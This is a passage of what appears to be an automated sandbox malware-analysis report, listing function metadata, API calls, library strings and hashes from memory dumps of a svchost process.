                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: SimpleString::operator=
                          • String ID: %s: %s$Expire Date$FALSE
                          • API String ID: 356670603-71436683
                          • Opcode ID: e027ffc4118d0b9bb66c5e752e5dddc9c15727a926725d0609c68769251add0f
                          • Instruction ID: 079f773202453a9140856bb273abc1ef6654877665cc49479c7ec161555b68d4
                          • Opcode Fuzzy Hash: e027ffc4118d0b9bb66c5e752e5dddc9c15727a926725d0609c68769251add0f
                          • Instruction Fuzzy Hash: 2631802BB0A6CAD4FA22DF60A4603ED2360AB56B98F900031DE0D57797DE38E5459304
                          Function 00007FFDA5595600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: Last-Modified:$Location:
                          • API String ID: 2653869212-3815226001
                          • Opcode ID: 599a1c7a1d5416f27c979ff16cb942ea950d10dc1930039c8dc97ed055a1bf7a
                          • Instruction ID: eda5080b957688927ceae3cd39c26854b3b6e7bc7c764678da65bb95ffdb1d5c
                          • Opcode Fuzzy Hash: 599a1c7a1d5416f27c979ff16cb942ea950d10dc1930039c8dc97ed055a1bf7a
                          • Instruction Fuzzy Hash: 4F317C6AF0F6CAC5FB16AE2490243B926A09F23F84F080035DA0D467D7EF6CE464C359
                          Function 00007FFDA55A4470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CreateEventcallocfree
                          • String ID: d
                          • API String ID: 1150888495-2564639436
                          • Opcode ID: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                          • Instruction ID: 258b84132e8e52d5559643e39df5583ed150a00807e63722faac7d9bc607948d
                          • Opcode Fuzzy Hash: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                          • Instruction Fuzzy Hash: C4311D39B1AA4AC1EB02DF61D8643A962A1FF9AF44F840831DA4D463ABDF7DE504C354
                          Function 64944410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52threadCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Error cleaning up spin_keys for thread , xrefs: 6494444A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentDebugOutputStringThread_ultoa
                          • String ID: Error cleaning up spin_keys for thread
                          • API String ID: 2892977721-2906507043
                          • Opcode ID: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                          • Instruction ID: 6273affc26e83ed8f3c49a0d043d27fd3918550a2ad95c3d4e2fd7ba9164ba49
                          • Opcode Fuzzy Hash: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                          • Instruction Fuzzy Hash: A711086278868082FF258F34E41035A2BE2E74676CF540731DA68467E8DB3DC545CB01
                          Function 00007FFDA557C690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Init_inflate
                          • String ID: 1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 2898956097-2669389255
                          • Opcode ID: 9c085d17d2010e19597c6ec7f19489e1812f7325124c332b6a279acef5a48fcd
                          • Instruction ID: 08398bb5a9e2dc8ff652af9b9fa86d9838bc4aa235cafc5b4d8d016bddbb5ef2
                          • Opcode Fuzzy Hash: 9c085d17d2010e19597c6ec7f19489e1812f7325124c332b6a279acef5a48fcd
                          • Instruction Fuzzy Hash: C7119167B19A86C1EB51CF16F4502692360FB45BC0F841032EA5D57B56DF2CD592C708
                          Function 64941C70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 64941C95
                          • GetCurrentThreadId.KERNEL32 ref: 64941CD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                          • API String ID: 2882836952-884133013
                          • Opcode ID: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                          • Instruction ID: a46da822108b5d6275fe5987b69bee3bdd31e53238ff1fe5d77ed74437cca604
                          • Opcode Fuzzy Hash: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                          • Instruction Fuzzy Hash: 6B018F7A38470086EB10DF26F840B4A3BA5F399F98F048225DD4C43710EB39C526C710
                          Function 00007FFDA55BC600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID: SENT$Sending data failed (%d)
                          • API String ID: 1802528911-3459338696
                          • Opcode ID: 2aff274a2aeec338eb62c68624eddaac8b154ca536ab6b363adfdbf71e396f6b
                          • Instruction ID: 84e5b35879f1af6f0dfcafb85cea7157ceb441bf74ce9823d6e60b96d0afce9e
                          • Opcode Fuzzy Hash: 2aff274a2aeec338eb62c68624eddaac8b154ca536ab6b363adfdbf71e396f6b
                          • Instruction Fuzzy Hash: 3201F727B2D69681DB11CF1AF89066A6B20EB8AFD0F542134FE4E47B5BDE2CC0418744
                          Function 00007FFDA557C780 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Error while processing content unencoding: %s, xrefs: 00007FFDA557C7CD
                          • Error while processing content unencoding: Unknown failure within decompression software., xrefs: 00007FFDA557C7DB
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freeinflate
                          • String ID: Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 3681154942-1163695657
                          • Opcode ID: 22443a040a1fca1175d6249ada236b8e373c81af97ff458de85bb1a143640a9d
                          • Instruction ID: 5e3b42adfddd49474e99d3a6b9710cb09a3be829ef9d0edde58485a9517dd04a
                          • Opcode Fuzzy Hash: 22443a040a1fca1175d6249ada236b8e373c81af97ff458de85bb1a143640a9d
                          • Instruction Fuzzy Hash: 3001526BB0A656D2EB15CF11E9643682360FB46F80F804175D64D47B56DF38E4A5C308
                          Function 00007FFDA55CA6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6E2
                          • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55CA6F0
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$ByteCharMultiWide$_wcsdupmalloc
                          • String ID: %s/%s
                          • API String ID: 612564020-2758257063
                          • Opcode ID: 4da834e0b1d64bc39cdebe95e6ac5c54e097d1dc2f923d92126572dcf9f8704a
                          • Instruction ID: 0e0d317a9ca17a14efd699fccc813ceaa2ca1957e4908cbdcc6954d9268833ee
                          • Opcode Fuzzy Hash: 4da834e0b1d64bc39cdebe95e6ac5c54e097d1dc2f923d92126572dcf9f8704a
                          • Instruction Fuzzy Hash: 56F0B41DF0B64A81EE07DF52F9682B952E1AF4AFC0B480030DE0E07B57ED2CD4854708
                          Function 64941440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: _Jv_RegisterClasses$libgcj-16.dll
                          • API String ID: 1646373207-328863460
                          • Opcode ID: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                          • Instruction ID: 41b3a94f408f7bae3b9d725e5a4e0a0769d76ac245e5e7c58dbb607d6e734eb2
                          • Opcode Fuzzy Hash: bc905c6d137a0c53196b9c0bd09bc0aeaa0806cc2f24fc447d6273a82a917542
                          • Instruction Fuzzy Hash: 64F05E107D2A04D5FE19DF72E88A37127E6AB56788FC40526841D063A0EF3DC276C320
                          Function 64942770 Relevance: 6.3, APIs: 5, Instructions: 86COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 64942789
                          • LeaveCriticalSection.KERNEL32 ref: 6494279F
                            • Part of subcall function 64941A20: EnterCriticalSection.KERNEL32 ref: 64941A36
                            • Part of subcall function 64941A20: LeaveCriticalSection.KERNEL32 ref: 64941A53
                          • LeaveCriticalSection.KERNEL32 ref: 64942803
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                          • Instruction ID: 839a74ca1950b2cb207cd67fc0816a519b1457acde348efc587b99345e1d84d6
                          • Opcode Fuzzy Hash: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                          • Instruction Fuzzy Hash: D43146766907408BD7448F36D84079E77A6F78ABDCF188222DE2A87758EF39D096C710
                          Function 00007FFDA5598510 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON
                          Download Yara Rule
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5598623
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1A7
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1B7
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1C5
                            • Part of subcall function 00007FFDA559F170: memset.VCRUNTIME140 ref: 00007FFDA559F1FB
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5598680
                            • Part of subcall function 00007FFDA55AFD70: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AFD87
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc$memset
                          • String ID: Content-Type$multipart/form-data
                          • API String ID: 2591755499-4152945368
                          • Opcode ID: d1e0db9c1ca23246d3388f98bfa3d65a1eec2359ef394186dcf759faaa8e4fcd
                          • Instruction ID: b6dacea69149e6df774e4f307376e3bc094b7c0d5a9f04cff9d5a04f60afaec8
                          • Opcode Fuzzy Hash: d1e0db9c1ca23246d3388f98bfa3d65a1eec2359ef394186dcf759faaa8e4fcd
                          • Instruction Fuzzy Hash: 6151637AB0A68A91FB5A8F2594743B922A1AF47FC8F5C0431DF0D4B79ADF2DD4408358
                          Function 00007FFDA55C5820 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: xn--
                          • API String ID: 1294909896-2826155999
                          • Opcode ID: d69014e38151fdcfc67c195dccbca22c63f924bd26036cfcbf3b6621bdefd638
                          • Instruction ID: 1fba26c2094d9d69c9728d29ec6c9c5fa5fa5fb1e313890691f117770c414d45
                          • Opcode Fuzzy Hash: d69014e38151fdcfc67c195dccbca22c63f924bd26036cfcbf3b6621bdefd638
                          • Instruction Fuzzy Hash: F951932AB0E68A86EA63CF5094603BA63A0FF96F55F944131CA9D47783DF3CE454C708
                          Function 00007FFDA55D2563 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 127COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: %s: %s$Start Date$TRUE
                          • API String ID: 0-2230884944
                          • Opcode ID: 68a81571ecdef5c4a137a9b296885c5e9f7e7d90c37b6d7927c75c620fb00e52
                          • Instruction ID: bfa9913283f93d38ad878b63dd256650f2fafd0744d1ca0156a86b07388ef60c
                          • Opcode Fuzzy Hash: 68a81571ecdef5c4a137a9b296885c5e9f7e7d90c37b6d7927c75c620fb00e52
                          • Instruction Fuzzy Hash: 91416757F0A2DB95FB6BCE6484303BC2BA1AB16B84F400036EA4E47BD7DE1CA544D348
                          Function 00007FFDA5592640 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_time64memmove
                          • String ID:
                          • API String ID: 1971662853-0
                          • Opcode ID: c2a971294bbe1eeb72241f0530a9a8e49296c1dce10cbb11a98eb0054fc56cbe
                          • Instruction ID: eacd8d12fb9061afbeac9969a45742fd33ee9e148ad12015ba80c4e5ffaf211f
                          • Opcode Fuzzy Hash: c2a971294bbe1eeb72241f0530a9a8e49296c1dce10cbb11a98eb0054fc56cbe
                          • Instruction Fuzzy Hash: 6E41932EB0A68985FB629F25D5243B967A0BB57FA4F084231EE5D137C6DF2CE4448704
                          Function 64945570 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                          • Instruction ID: f54dc3540dcdf39a3e766a566c17badb3a3e851a3ded68f22904b7f3e537b287
                          • Opcode Fuzzy Hash: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                          • Instruction Fuzzy Hash: 0521CC22BC611446FF5A9FF5E95037D16566F99BB8F580624CF2D4B3A4FF28C8828B00
                          Function 64945F50 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          • GetHandleInformation.KERNEL32 ref: 64945F87
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: HandleInformation
                          • String ID:
                          • API String ID: 1064748128-0
                          • Opcode ID: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                          • Instruction ID: 79745a4ad5391706be20fe4235e8674050c91398eb3db706ed52aa63cfbd30a6
                          • Opcode Fuzzy Hash: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                          • Instruction Fuzzy Hash: 9431A0213C150080FB11DF32ED403AA63AAEF94BD8F4445728E1D977A4EF39C986C321
                          Function 649472B0 Relevance: 6.1, APIs: 4, Instructions: 86timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649472DB
                            • Part of subcall function 649456A0: WaitForSingleObject.KERNEL32 ref: 649456C4
                          • _errno.MSVCRT ref: 6494733E
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 6494735B
                          • _errno.MSVCRT ref: 649473B8
                          Memory Dump Source
